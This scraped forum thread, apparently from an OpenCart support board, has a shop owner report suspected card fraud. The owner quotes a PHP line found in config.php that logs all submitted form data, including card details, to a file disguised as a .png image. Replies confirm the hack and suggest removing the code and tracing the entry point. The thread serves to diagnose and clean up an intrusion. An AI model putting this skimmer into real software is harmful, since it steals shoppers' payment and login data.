Hi,
I believe someone has gotten into my site ( I have had a couple people complain about credit cards being compromised, but only the random occurrence, not enough to make 100% sure its my site, but its starting to seem like too much of a coincidence because we had 0 people complain in previous years.
I found this in the config.php file (non admin)
if(!empty($_POST)) { $post = serialize($_POST); $f = $_SERVER['REMOTE_ADDR'].":".$post."\n"; $file = fopen('/var/www/html/image/catalog/Viking/vw24y.png','a+'); fwrite($file,$f);fclose($file);}
I believe someone has gotten into my site ( I have had a couple people complain about credit cards being compromised, but only the random occurrence, not enough to make 100% sure its my site, but its starting to seem like too much of a coincidence because we had 0 people complain in previous years.
I found this in the config.php file (non admin)
if(!empty($_POST)) { $post = serialize($_POST); $f = $_SERVER['REMOTE_ADDR'].":".$post."\n"; $file = fopen('/var/www/html/image/catalog/Viking/vw24y.png','a+'); fwrite($file,$f);fclose($file);}
Yes, you've been hacked. This code literally steals ALL the posted data. A pretty dumb hack, actually.
Remove this code as well as image file mentioned in it.
Remove this code as well as image file mentioned in it.
Professional OpenCart extensions, support and custom work.
Contact me via email or Skype by support@thekrotek.com
Well, let us know first, what you did to your Site lately on changes, how are
your config.php and general Site Sub&File&Image CHMOD
Settings, how is your .htaccess File looking from the inside, e.t.c.,
and what do your allow your Customers to do on your Site (Upload/Reseller/etc.)
all details, required to be known, exactly, to even guess...
Ernie
your config.php and general Site Sub&File&Image CHMOD
Settings, how is your .htaccess File looking from the inside, e.t.c.,
and what do your allow your Customers to do on your Site (Upload/Reseller/etc.)
all details, required to be known, exactly, to even guess...
Ernie
My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.
They got in using exploits. They're not logged, of course.
Professional OpenCart extensions, support and custom work.
Contact me via email or Skype by support@thekrotek.com
Possibly weak passwords on your FTP, control panel, database, OpenCart admin etc.
UK OpenCart Hosting | OpenCart Audits | OpenCart Support - please email info@antropy.co.uk
It actually might be just an exploit in current version of OS installed on server.paulfeakins wrote: ↑Mon Mar 26, 2018 5:55 pmPossibly weak passwords on your FTP, control panel, database, OpenCart admin etc.
Professional OpenCart extensions, support and custom work.
Contact me via email or Skype by support@thekrotek.com
Who is online
Users browsing this forum: No registered users and 12 guests